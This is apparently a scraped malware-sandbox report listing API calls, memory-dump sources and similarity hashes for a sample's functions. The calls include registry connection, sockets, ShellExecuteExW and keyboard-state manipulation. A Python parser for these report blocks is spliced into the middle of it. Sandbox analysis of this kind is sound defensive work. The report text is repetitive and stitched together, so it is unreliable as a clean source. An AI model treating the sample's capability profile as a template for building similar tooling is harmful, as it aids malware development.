                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: ArraySafeVartype
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 1725837607-0
                                                                                                                                                                                                                                                      • Opcode ID: 94b9dba1a99babe3bb18aae03fa1c1134be9a946574f786462aceb57db26cf14
                                                                                                                                                                                                                                                      • Instruction ID: fe0f6f6f59287bbbc55a48187f841980a2bc6c7daa9fe3916a341b1d1b845f1a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 94b9dba1a99babe3bb18aae03fa1c1134be9a946574f786462aceb57db26cf14
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7C17D75A0531ADFDB00CF94C885BAEB7F4EF09311F20806AE605EB2D1D738A941EB91
APIs
• GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F06B63
• LoadStringW.USER32(00000000), ref: 00F06B6A
• GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F06B80
• LoadStringW.USER32(00000000), ref: 00F06B87
• _wprintf.LIBCMT ref: 00F06BAD
• MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F06BCB
Strings
• %s (%d) : ==> %s: %s %s, xrefs: 00F06BA8
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: HandleLoadModuleString$Message_wprintf
• String ID: %s (%d) : ==> %s: %s %s
• API String ID: 3648134473-3128320259
• Opcode ID: 09f861e29b4ba2454cd49c01511583a904461d8ab0b02db79fcdafead89c0919
• Instruction ID: 4dee98d5ace30f6574fa250fc8dccbb2591765942c2352c7fadf1fc29ad67a5f
• Opcode Fuzzy Hash: 09f861e29b4ba2454cd49c01511583a904461d8ab0b02db79fcdafead89c0919
• Instruction Fuzzy Hash: 4F0136F690020CBFE711A7949D89EFB776CD708305F004496BB45E2141EA74DE84AF71
APIs
  • Part of subcall function 00F23C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F22BB5,?,?), ref: 00F23C1D
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F22BF6
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: BuffCharConnectRegistryUpper
• String ID:
• API String ID: 2595220575-0
• Opcode ID: dc839ef0f7b1a1d8bc224f074b3716cc66617acc63d9f1efe2d45b3acdc1930e
• Instruction ID: 01165e13944c50cc4006f65212314d623ed92a7834ab199f8aab53df5cd20dae
• Opcode Fuzzy Hash: dc839ef0f7b1a1d8bc224f074b3716cc66617acc63d9f1efe2d45b3acdc1930e
• Instruction Fuzzy Hash: A0917971604211AFCB10EF58D981F6EB7E5FF98310F04881DF996972A2DB35E906EB42
APIs
• select.WSOCK32 ref: 00F19691
• WSAGetLastError.WSOCK32(00000000), ref: 00F1969E
• __WSAFDIsSet.WSOCK32(00000000,?), ref: 00F196C8
• #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 00F196E9
• WSAGetLastError.WSOCK32(00000000), ref: 00F196F8
• inet_ntoa.WSOCK32(?), ref: 00F19765
• htons.WSOCK32(?), ref: 00F197AA
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: ErrorLast$htonsinet_ntoaselect
• String ID:
• API String ID: 500251541-0
• Opcode ID: f69690fad03d4b3e0777e95d552bccad6d41d8c5f5878f65460532c6fc8b61f5
• Instruction ID: 992d754a6dce1390eb23dd93bd3e3f4926e72eb5ea71fa3f065a6b1e73423991
• Opcode Fuzzy Hash: f69690fad03d4b3e0777e95d552bccad6d41d8c5f5878f65460532c6fc8b61f5
• Instruction Fuzzy Hash: B171DD32508200ABC314EF64CC91FABB7E8EF85724F104A1DF555AB2A1EB71DD45DBA2
APIs
• __mtinitlocknum.LIBCMT ref: 00EEA991
  • Part of subcall function 00EE7D7C: __FF_MSGBANNER.LIBCMT ref: 00EE7D91
  • Part of subcall function 00EE7D7C: __NMSG_WRITE.LIBCMT ref: 00EE7D98
  • Part of subcall function 00EE7D7C: __malloc_crt.LIBCMT ref: 00EE7DB8
• __lock.LIBCMT ref: 00EEA9A4
• __lock.LIBCMT ref: 00EEA9F0
• InitializeCriticalSectionAndSpinCount.KERNEL32(8000000C,00000FA0,00F76DE0,00000018,00EF5E7B,?,00000000,00000109), ref: 00EEAA0C
• EnterCriticalSection.KERNEL32(8000000C,00F76DE0,00000018,00EF5E7B,?,00000000,00000109), ref: 00EEAA29
• LeaveCriticalSection.KERNEL32(8000000C), ref: 00EEAA39
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ec0000_file.jbxd
Similarity
• API ID: CriticalSection$__lock$CountEnterInitializeLeaveSpin__malloc_crt__mtinitlocknum
• String ID:
• API String ID: 1422805418-0
• Opcode ID: 288dc8a348e3488628115e9d5a00d717b9786ae9b3ff2a787be49ee8644ae4ad
• Instruction ID: 7b52ebc22feb13265986589b0cc167c4f8462e60e9e024a13018451516575354
• Opcode Fuzzy Hash: 288dc8a348e3488628115e9d5a00d717b9786ae9b3ff2a787be49ee8644ae4ad
• Instruction Fuzzy Hash: E6412C7190078D9BEB149F6AD9447ACB7F0AF01324F18933CE429BB2D1DB74A944CB81
APIs
• DeleteObject.GDI32(00000000), ref: 00F28EE4
• GetDC.USER32(00000000), ref: 00F28EEC
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 00F28EF7
• ReleaseDC.USER32(00000000,00000000), ref: 00F28F03
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00F28F3F
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F28F50
• MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00F2BD19,?,?,000000FF,00000000,?,000000FF,?), ref: 00F28F8A
                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00F28FAA
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3864802216-0
                                                                                                                                                                                                                                                      • Opcode ID: cb47af2687443e401602ec8f1701e0cbe0df0371d18c64489c6f2ea3017932fd
                                                                                                                                                                                                                                                      • Instruction ID: 5cbf8e4736343c829551919fa71944dd78c0b5dddb6a09b579226dd321ed4861
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cb47af2687443e401602ec8f1701e0cbe0df0371d18c64489c6f2ea3017932fd
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 72319F76201224BFEB108F50DC49FEA3BADEF5A765F054065FE089A191C6B59842DB70
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
                                                                                                                                                                                                                                                        • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
                                                                                                                                                                                                                                                        • Part of subcall function 00EDC6F4: _wcscpy.LIBCMT ref: 00EDC717
                                                                                                                                                                                                                                                      • _wcstok.LIBCMT ref: 00F1184E
                                                                                                                                                                                                                                                      • _wcscpy.LIBCMT ref: 00F118DD
                                                                                                                                                                                                                                                      • _memset.LIBCMT ref: 00F11910
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                                                                                                                      • String ID: X
                                                                                                                                                                                                                                                      • API String ID: 774024439-3081909835
                                                                                                                                                                                                                                                      • Opcode ID: 2127e83307fbdbcf78b3b80175706a76378518447a0ce54847c4dae8aa5fd3a2
                                                                                                                                                                                                                                                      • Instruction ID: 797411992fb0531e09e83f6eca083b6a44553ff17c4ddd25c37412804236cab1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2127e83307fbdbcf78b3b80175706a76378518447a0ce54847c4dae8aa5fd3a2
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C4C18C315093409FC724EF64C995F9AB7E0BF85350F04492DF99AA72A2DB31EC46DB82
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                        • Part of subcall function 00EDB34E: GetWindowLongW.USER32(?,000000EB), ref: 00EDB35F
                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(0000000F), ref: 00F3016D
                                                                                                                                                                                                                                                      • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 00F3038D
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00F303AB
                                                                                                                                                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?), ref: 00F303D6
                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00F303FF
                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000003,00000000), ref: 00F30421
                                                                                                                                                                                                                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 00F30440
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: Window$MessageSend$InvalidateLongMetricsMoveProcRectShowSystem
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 3356174886-0
                                                                                                                                                                                                                                                      • Opcode ID: 857e3c3d793ac685e9fb5e9b217d2171630fb1eb7214354bfeda9842a7454b4c
                                                                                                                                                                                                                                                      • Instruction ID: 0040ba720f760308306f07f96a9b91d2cca60f3378cd05bac87c0ece61ca1d1b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 857e3c3d793ac685e9fb5e9b217d2171630fb1eb7214354bfeda9842a7454b4c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2EA1C235A00616EFDB18CF68C9957BEBBB1FF04720F048116EC54A7290DB34AD50EB90
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 81b1f0dae7b8e00c7e0ccce5ecefc6edef7065b75c8eb8613fb36accd5da735e
                                                                                                                                                                                                                                                      • Instruction ID: 1a7b19de69562b56e86f17684eae9f654f3dd083abfcd05ef6d5ef9a6890d08a
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81b1f0dae7b8e00c7e0ccce5ecefc6edef7065b75c8eb8613fb36accd5da735e
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A716DB1A00109EFCB14CF98CC49AAEBB75FF85314F14819AF915AB391C734AA42DF65
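The function summaries above follow one fixed layout: an APIs list (direct calls with their logged operands and the call-site address after "ref:", plus "Part of subcall function" entries reached through a callee), an optional Strings list, the Memory Dump Source whose "Offset:" is the load base of the dumped image, and a Similarity block that always ends with the Instruction Fuzzy Hash. Working through a report of this size by hand is impractical, so the following Python parser, added here and not part of the Joe Sandbox report or its plugin, turns those blocks into records that can be searched (for example, every function that reaches ShellExecuteExW) and converts a call-site address into an offset inside the dump. The sample input is constructed for the example from the shape of the blocks shown on this page; the field names (ApiCall, FunctionBlock) and the rule that a block ends at its Instruction Fuzzy Hash line are assumptions of this parser, not something the report documents.

```python
"""Parse Joe Sandbox IDA-plugin function summaries (the blocks above) into records."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample: two function summaries in the layout used on this page. Values are
# modelled on blocks shown above, but only the shape matters to the parser.
SAMPLE_REPORT = """\
APIs
• DeleteObject.GDI32(00000000), ref: 00F28EE4
• GetDC.USER32(00000000), ref: 00F28EEC
• CreateFontW.GDI32(?,00000000,00000000,00000000,00000000,?,?,?,00000001,00000004,00000000,?,00000000,?), ref: 00F28F3F
• SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00F28F50
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
• Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmp
Similarity
• API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
• String ID:
• API String ID: 3864802216-0
• Instruction Fuzzy Hash: 72319F76201224BFEB108F50DC49FEA3BADEF5A765F054065FE089A191C6B59842DB70
APIs
• _memset.LIBCMT ref: 00F2225A
• ShellExecuteExW.SHELL32(?), ref: 00F22368
  • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
  • Part of subcall function 00EDC6F4: _wcscpy.LIBCMT ref: 00EDC717
• CloseHandle.KERNEL32(00000000), ref: 00F2242F
• FreeLibrary.KERNEL32(00000000), ref: 00F2243E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
Similarity
• String ID: X
• API String ID: 774024439-3081909835
• Instruction Fuzzy Hash: C4C18C315093409FC724EF64C995F9AB7E0BF85350F04492DF99AA72A2DB31EC46DB82
"""

SECTION_HEADINGS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# Name.MODULE, optional "(arg,arg,...)" as logged by the tracer, then the call-site address.
API_RE = re.compile(r"(?P<name>[^\s.(]+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SUBCALL_RE = re.compile(r"Part of subcall function (?P<fn>[0-9A-Fa-f]+): (?P<rest>.+)$")
SOURCE_RE = re.compile(r"Source File: (?P<file>\S+), Offset: (?P<base>[0-9A-Fa-f]+)")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]          # hex operands as logged; "?" means the tracer could not resolve one
    ref: int                 # virtual address of the call site in the dumped image
    subcall_of: int | None   # callee address when the API is reached through a subcall


@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    source_file: str = ""
    image_base: int | None = None
    similarity: dict[str, str] = field(default_factory=dict)


def parse_blocks(text: str) -> list[FunctionBlock]:
    """Split report text into function summaries; a block ends at its Instruction Fuzzy Hash."""
    blocks: list[FunctionBlock] = []
    cur, section = FunctionBlock(), ""
    for raw in text.splitlines():
        line = raw.strip()                      # the HTML export indents every line heavily
        if line in SECTION_HEADINGS:
            section = line
            continue
        if not line.startswith("•"):
            continue                            # anything that is not a bullet is page residue
        item = line.lstrip("•").strip()
        if section == "APIs":
            subcall = None
            if m := SUBCALL_RE.match(item):
                subcall, item = int(m["fn"], 16), m["rest"]
            if m := API_RE.match(item):
                args = m["args"].split(",") if m["args"] is not None else []
                cur.apis.append(ApiCall(m["name"], m["module"], args, int(m["ref"], 16), subcall))
        elif section == "Strings":
            cur.strings.append(item)
        elif section == "Memory Dump Source":
            if m := SOURCE_RE.match(item):      # "Associated:" dumps are deliberately skipped
                cur.source_file, cur.image_base = m["file"], int(m["base"], 16)
        elif section == "Similarity":
            key, _, value = item.partition(":")
            cur.similarity[key.strip()] = value.strip()
            if key.strip() == "Instruction Fuzzy Hash":   # last field of every block
                blocks.append(cur)
                cur, section = FunctionBlock(), ""
    if cur.apis or cur.similarity:                        # keep a truncated trailing block
        blocks.append(cur)
    return blocks


def direct_sequence(block: FunctionBlock) -> list[str]:
    """API names the function itself calls, in address order (subcall entries excluded)."""
    return [c.name for c in sorted(block.apis, key=lambda c: c.ref) if c.subcall_of is None]


def file_offset(block: FunctionBlock, call: ApiCall) -> int:
    """Offset of a call site inside the dumped image: ref minus the dump's load base."""
    if block.image_base is None:
        raise ValueError("block has no Source File line")
    return call.ref - block.image_base


def blocks_calling(blocks: list[FunctionBlock], names: set[str]) -> list[FunctionBlock]:
    """Blocks whose API list (direct or via subcall) contains any of the given names."""
    return [b for b in blocks if names & {c.name for c in b.apis}]
```

Feed it the saved text of the report and filter with blocks_calling on the APIs that matter for this sample's behaviour (process creation, memory writes into other processes, clipboard reads); file_offset then gives the position to open in the downloaded .sdmp for each hit.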
APIs
• _memset.LIBCMT ref: 00F2225A
• _memset.LIBCMT ref: 00F22323
• ShellExecuteExW.SHELL32(?), ref: 00F22368
  • Part of subcall function 00EC936C: __swprintf.LIBCMT ref: 00EC93AB
  • Part of subcall function 00EC936C: __itow.LIBCMT ref: 00EC93DF
  • Part of subcall function 00EDC6F4: _wcscpy.LIBCMT ref: 00EDC717
• CloseHandle.KERNEL32(00000000), ref: 00F2242F
• FreeLibrary.KERNEL32(00000000), ref: 00F2243E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: _memset$CloseExecuteFreeHandleLibraryShell__itow__swprintf_wcscpy
                                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                                      • API String ID: 4082843840-2766056989
                                                                                                                                                                                                                                                      • Opcode ID: d865a2a811f570567fcc395dc0627424821d1fca77d80d2caaa6a899e240159d
                                                                                                                                                                                                                                                      • Instruction ID: 72242b5bfea2219d852b277a725ba7f23bdf6779d873737ee9fddebae95a21c6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d865a2a811f570567fcc395dc0627424821d1fca77d80d2caaa6a899e240159d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3716C74900629AFCF04EF98D985A9EB7F5FF48310F108459E855BB391CB35AD41DB90
                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00F03DE7
                                                                                                                                                                                                                                                      • GetKeyboardState.USER32(?), ref: 00F03DFC
                                                                                                                                                                                                                                                      • SetKeyboardState.USER32(?), ref: 00F03E5D
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000010,?), ref: 00F03E8B
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F03EAA
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F03EF0
                                                                                                                                                                                                                                                      • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F03F13
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1654345996.0000000000EC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654334426.0000000000EC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F4D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654381968.0000000000F6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654655280.0000000000F7A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000F84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1654671338.0000000000FC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID: 87235514-0
                                                                                                                                                                                                                                                      • Opcode ID: b81c8d0eec1b684109f083cad7c6e161bfabd0bb63f28b92ac0a0c57ef17bec4
                                                                                                                                                                                                                                                      • Instruction ID: 5b8c7935f1f2f54349e1ff4ff4f08e0dfafebcb2aeb591450b9402df7d0c9344
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b81c8d0eec1b684109f083cad7c6e161bfabd0bb63f28b92ac0a0c57ef17bec4
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5F51C2A0E047D63DFB364324CC55BB67EAD5B06314F088589E1D9468D2D3A8AEC8F760
                                                                                                                                                                                                                                                      APIs
